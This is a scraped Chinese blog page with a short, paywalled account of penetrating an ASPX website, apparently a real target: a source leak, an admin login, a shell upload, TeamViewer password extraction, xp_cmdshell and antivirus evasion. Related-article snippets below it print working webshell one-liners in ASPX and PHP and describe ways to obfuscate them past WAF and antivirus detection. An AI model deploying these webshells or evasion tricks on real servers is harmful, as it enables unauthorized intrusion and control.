shell 免杀aspx_记一次aspx网站渗透

最新推荐文章于 2026-06-17 12:10:42 发布
原创 最新推荐文章于 2026-06-17 12:10:42 发布 · 1.7k 阅读 · 2
标签
#shell 免杀aspx
本文记录了一次针对ASXP网站的渗透过程,从信息收集到源码泄露,再到发现TeamViewer并利用SharpDecryptPwd解析密码。通过FRP免杀代理进行数据库提权,开启xp_cmdshell,绕过杀软限制,最终实现系统控制。过程中涉及SQL注入、命令执行、权限提升等技巧,并揭示了内网安全的重要性。

95397184c82973e8bdc99e5136b5eb7d.gif

通过前期信息搜集获取到目标站的80xx端口

0c8b823e92699f44fc8087c1aa414f16.png

发现一处源码泄露
查看配置文件

36492b43a1898efcc679b660e62611fa.png

登录manage.aspx

5fbe1749af39b1cc85a978974f158449.png

上传shell
发现安装了TeamViewer

814d5622e35763e742ced36e34bffd93.png

看下进程如果运行tv的话,可直接读取其远程的账号密码
https://github.com/uknowsec/SharpDecryptPw

最低0.47元/天 解锁文章
简内特
关注
aspx大马,AspxSpy2014,AspxSpy
06-06
责声明: 本程序只用于管理员安全检测,使用前请注意环境与法律法规,因使用不当造成的后果本人不承担任何责任。 已测试的系统: win2003+iis6+.net 2.0 win2008+iis7+.net 4.0 win8+iis8+.net 4.5 注意:此版本最低需要.net 2.0环境,不再支持.net 1.1。如果目标机器是.net 1.1,请换用AspxSpy2010。 由于js问题,建议使用ie8+/ff等浏览器访问,win2003自带的ie6在多个功能页面会显示白板。 此版本为开发版本,未进行任何加密,同时不具备功能。如果没有特殊情况,AspxSpy将不再更新(可能更新插件)。如果有需要的话可以自行进行二次开发,但请保留版权。
ASPX一句话shell客户端+ASPXshell MS08-067插件
12-28
ASPX一句话shell客户端+ASPXshell MS08-067插件
无限D盾脚本之aspx ——yzddMr6
yzddMr6的博客
11-19 3850
前言 自己曾经写过一篇文章:利用随机异或无限某盾 php的webshell方法有很多,但是市面上很少有讲aspx的文章. 因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx 0x01 主要方法 字符串拼接 函数 数组 Base64编码 0x02 了解aspx一句话 Aspx的一句话一般是使用Jscript语言实...
shell aspx_对于aspwebshell的一些总结
weixin_31235909的博客
12-31 824
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
ASPX 1句话SHELL
收集盒 Book box
11-09 674
ISTO的版本     ASPX One Code     " enctype="multipart/form-data"> filename:          c# if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }
shell aspx_Webshell
weixin_39656513的博客
12-31 762
一句话木马在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个的大马挂马。最常见的php一句话木马这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则,尝试改写一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...
【实战】对某厂商演示站点的一次渗透测试
xiaoi123的博客
09-04 536
前言 其实这个厂商之前就挖过他们家漏洞,提交了不少漏洞给他们,如今都修复了,最近闲来无事,又对他们演示站点进行了一次“深入”研究。 0x01 演示站点入手 打开他们演示站点,测试了一下之前的漏洞,空账号空密码登录已经被修复了,尝试弱口令登录,123456登录进去了。 然后对之前存在漏洞的上传点再次尝试截断上传,发现已经修复了。 后台多了一些功能,比如下面这个“文档管理”,上传已经绕不过...
哥斯拉Webshell管理工具:、加密与高级插件实战指南
最新发布
weixin_30521161的博客
06-17 296
Webshell是Web安全测试与应急响应中的关键技术,其核心原理是通过在Web服务器上植入脚本,建立远程控制通道。随着WAF(Web应用防火墙)和流量检测技术的演进,传统Webshell的静态特征和通信模式极易被识别拦截。因此,现代Webshell管理工具的价值在于实现有效的和流量隐匿,以应对日益严格的安全防护。哥斯拉(Godzilla)正是这样一款综合性平台,它深度集成了针对Java、PHP、C#等主流环境的动态加密通信机制,并内置了从基础文件管理到高级内存马注入、数据库连接、权限提升等丰富的插件生
内网渗透思路10之SPN拿下域控
划水的小白白
10-31 2109
站库分离、外网打点 、过软、多层网络渗透、横向渗透、jwt token密钥破解、 phpmyadmin写shell、sqlserver 提权、SPN服务的利用、权限提升、域渗透
无限D盾脚本之aspx
seoppg的博客
08-10 519
本文介绍了ASPX WebShell技术,重点针对安全防护软件(如某盾)的检测机制。作者通过分析ASPX一句话木马的基本结构,发现"unsafe"参数是关键检测特征,提出了四种绕过方法:1)字符串截取拼接;2)数组乱序重组;3)函数返回值封装;4)Base64编码转换。测试表明当前ASPX检测较弱,这些方法可组合使用增强混淆效果。作者已开发自动化脚本并开源,能批量生成WebShell。项目地址:https://github.com/caidaox/webshell(注:本文
第六十六课:借助aspx对payload进行分离1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
ASP.NET下Webshell编译产物
2401_83799022的博客
08-20 1660
但编译产物会被导致无法连接webshell,以冰蝎aspx的webshell为例。Webshell的文件可参考以下链接,通过unicode编码就可以实现。通过dnspy反编译和不断测试,以下方法的变换对于编译产物而言没有任何影响。但当有卡巴斯基等软时,虽然aspx、ashx、asmx文件没有被。7、字符串常量的拼接,如"Load"替换为"Lo"+"ad"为了保证aspx,仍使用unicode编码。通过变异的base64来编码字符串常量,如。1、unicode编码。
shell aspx_绕过WebShell检测的总结之文件
weixin_31124869的博客
12-31 803
WAF会维护一个规则库录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木马后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
ASPX史上最全一句话集合
2301_80115097的博客
10-18 2774
/可执行命令一句话。
牛逼的一句话木码
Daoke37的博客
05-10 614
//可执行命令一句话 普通一句话 <?php eval($_POST[cc123]) ?> <?php @eval($_POST['cc123']);?> PHP系列 <?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?> <?php $lang = (string)key($_POST);$lang($_POST['xindong']);?> <?php $k="as
AspxSpy2014 Final
weixin_33890499的博客
01-30 432
受bin牛委托修改并发布,版权归bin牛所有。 Bug/建议提交:zcgonvh@rootkit.net.cn 祝各位马年大吉,财源滚滚。 责声明: 本程序只用于管理员安全检测,使用前请注意环境与法律法规,因使用不当造成的后果本人不承担任何责任。 已测试的系统: win2003+iis6+.net 2.0 win2008+iis7+.net 4.0 win8+iis8+.ne...
shell aspx_webshell?无限生成工具蚁剑
weixin_36378347的博客
01-07 1248
as_webshel??l_venomwebshel??l-venom蚁剑版(thx @SardineFish&@Medicean)原项目地址:https://github.com/yzddmr6/webshel??l-venom3.2更新日志鸽了这么久,我来更新啦更新修复已知问题:宝塔在遇到header404时会解析到他的404模版上,而不是shell上,导致无法连接,故去除头部的...
shell aspx_发个修改的aspx提权马qingshell.aspx
weixin_35795675的博客
01-30 753
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
aspx web入侵渗透经验总结
热门推荐
ccx_john的专栏
12-26 1万+
对一般遇到.net的网站时      1、通常会注册个用户    第一选择利用上传判断的漏洞 加图片头GIF89A 顺利饶过    2、    第二种就是注入了, 在?id=xx后加单引号 '    一般情况下 用NBSI 啊D来SCAN 都可以发现BUG页面    而且国内大多.net都是使用MSSQL数据库    发现注入点也可以从login下手 其实这个方法目前的成功率在75%
shell aspx_ webshell 小叙 [ 一 ]
weixin_39607798的博客
01-13 727
0x01 基于各类常规命令和代码执行函数的花样变形[如,拆分重组,动态执行,以此来躲避静态特征检测],不过像有些高危函数默认就会被运维们禁掉,甚至高版本的php默认已经不让执行[如,php7],万一再开了安全模式,就又有点儿费劲了php中一些常见的执行类型函数:system()exec()shell_exec()passthru()proc_open()`` 反引号执行系统命令...利用rot13...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值